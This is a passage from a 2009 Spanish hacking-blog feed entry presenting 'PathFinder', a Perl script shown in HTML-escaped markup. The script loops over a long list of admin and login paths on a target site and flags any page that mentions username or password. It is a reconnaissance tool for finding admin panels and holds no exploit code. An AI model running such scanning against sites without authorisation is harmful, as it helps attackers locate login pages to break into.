rgb(255, 0, 0);"&gt;'administr8/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administr8.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'webadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'webadmin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'webadmin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'webadmin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administratie/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admins/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admins.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admins.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admins.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrivia/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Database_Administration/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'WebAdmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sysadmins/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin1/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'system-administration/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrators/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'pgadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'directadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'staradmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ServerAdministrator/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'SysAdmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administer/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sys-admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'typo3/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'panel/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cpanel/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cPanel/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cpanel_file/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'platz_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'rcLogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'blogindex/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'formslogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'autologin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'support_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'meta_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'manuallogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'simpleLogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'loginflat/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'utility_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'showlogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'memlogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'members/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login-redirect/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sub-login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'wp-login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login1/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'dir-login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login_db/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'xlogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'smblogin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'customer_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login-us/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'acct_login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin_area/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'bigadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'project-admins/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'phppgadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'pureadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sql-admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'radmind/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'openvpnadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'wizmysqladmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'vadmind/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ezsqliteadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'hpwebjetadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'newsadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'adminpro/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Lotus_Domino_Admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'bbadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'vmailadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Indy_admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ccp14admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'irc-macadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'banneradmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sshadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'phpldapadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'macadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administratoraccounts/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin4_account/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin4_colon/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'radmind-1/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Super-Admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'AdminTools/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cmsadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'SysAdmin2/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'globes_admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cadmins/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'phpSQLiteAdmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'navSiteAdmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'server_admin_small/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'logo_sysadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'server/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'database_administration/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ADMIN/login.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'system_administration/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ss_vms_admin_sm/'&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(177, 177, 0);"&gt;foreach&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$finder&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;@paneles&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;{&lt;/span&gt;&lt;br /&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$buscador&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=&lt;/span&gt; LWP&lt;span style="color: rgb(51, 153, 51);"&gt;::&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;UserAgent&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;new&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt; &lt;span style="color: rgb(177, 177, 0);"&gt;or&lt;/span&gt; &lt;a href="http://perldoc.perl.org/functions/die.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;die&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$buscador&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;get&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;$target&lt;/span&gt;.&lt;span style="color: rgb(255, 0, 0);"&gt;"/"&lt;/span&gt;.&lt;span style="color: rgb(0, 0, 255);"&gt;$finder&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span style="color: rgb(177, 177, 0);"&gt;if&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/username/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Username/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/UserName/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/usuario/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Usuario/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/user/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/User/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/password/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Password/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/contraseña/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Contraseña/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/senha/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Senha/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/pass/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Pass/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt;&lt;br /&gt;  &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/pwd/&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;||&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$busqueda&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;-&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;content&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=~&lt;/span&gt; &lt;span style="color: rgb(0, 153, 102); font-style: italic;"&gt;/Pwd/&lt;/span&gt;&lt;br /&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;print&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;"&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;\n&lt;/span&gt; [+] Encontrado: $target/$finder &lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;\a&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/exit.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;exit&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;/pre&gt;&lt;/blockquote&gt;&lt;br /&gt;Espero que os guste &lt;img src="http://foro.elhacker.net/Smileys/navidad/wink.gif" alt=";)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;bytes&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-4535261778445766774?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/4535261778445766774/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-xassiz-pathfinder-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4535261778445766774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4535261778445766774'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/12/tool-xassiz-pathfinder-by-xassiz.html' title='[Tool] xassiz PathFinder  -  by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 